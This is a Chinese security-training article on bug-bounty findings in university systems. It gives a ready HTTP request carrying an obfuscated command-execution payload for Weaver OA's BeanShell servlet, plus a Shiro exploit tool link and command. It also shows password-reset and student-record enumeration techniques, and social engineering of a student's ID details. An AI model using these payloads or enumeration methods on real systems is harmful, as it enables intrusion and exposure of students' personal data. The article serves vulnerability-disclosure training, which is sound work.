点击星标，即时接收最新推文

本文对edusrc挖掘的部分漏洞进行整理，将案例脱敏后输出成文章，不包含0DAY/BYPASS的案例过程，仅对挖掘思路和方法进行相关讲解。

命令执行类

St2命令执行

在电量查询手机管理平台，观察到.do或.action后缀，

http://xxx:8080/mobile/mobile!login.action

通过工具检测存在struts2-046漏洞，

判断存在system系统权限，

直接getshell和执行任意命令。

第三方应用命令执行

泛微OA Bsh 远程代码执行漏洞为例：

通过个人经验或者cms识别工具判断目标的CMS类型，

http://xxx:8080/login/Login.jsp?logintype=1

先验证漏洞：

http://xxx/weaver/bsh.servlet.BshServlet

可以执行任意函数，

然后上burpsuite，发送以下数据包：

POST /weaver/bsh.servlet.BshServlet HTTP/1.1

Host: xxx:8080

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Length: 98

Content-Type: application/x-www-form-urlencoded

bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

成功获取root权限，实现任意命令执行。

Shiro远程命令执行 

某大学宿舍管理系统存在apache shiro反序列化：在登录页面时，提交表单后发现set-cookie存在remeberMe=deleteMe字样。

exp：

https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip

如图：

java -jar shiro_tool.jar http://xxx.edu.cn/

Key已经爆破成功，使用xray的shrio插件或者shiro_attack_1.5使用构造链即可执行任意命令。

越权逻辑类

密码重置

初次登陆需要更改密码，但未验证原始密码，

利用审查元素或抓包更改学号为其他人的，成功重置他人密码，

管理功能未限制权限访问

先获取高权限用户权限，然后将高权限用户接口放到低权限用户上访问对其没有限制，如：

对全校学生进行管理，泄露数万学生个人敏感信息，

http://xxx.edu.cn/xxx/student_new/query.jsp?cdbh=xxx

直接重置系统任意单位用户密码，

http://xxx/xxx/xxx/xxxPassword.jsp

个人照片遍历

直接查看照片链接，是否存在参数或文件名称可猜解（包含学号、工号、ID值等信息），遍历即可获取所有个人照片。如：

1、参数遍历：

http://xxx.edu.cn/Common/ResourceReq.ashx?t=stupic&i=学号 ......

2、文件名遍历：

http://xxx.edu.cn/attachments/ds_photo/工号.jpg http://xxx/xg/vfs/vfs.do?path=年份/STD_INFO/RXZP/学号.jpg ......

学工系统遍历学号

社工获取某学校学姐身份证号加学号等个人敏感信息，登录学工系统，在学工系统个人信息查看功能抓包，获取到以下接口，

通过修改学号获取个人相关敏感信息。

某大学体温上报系统，

抓包更改接口，泄露密码、学号、身份证号、手机号、学院专业等信息。

过往推文：

eduSRC那些事儿-2（sql注入类+文件上传类）

eduSRC那些事儿-1（信息泄露+弱口令）

—  实验室旗下直播培训课程  —

和20000+位同学加入MS08067一起学习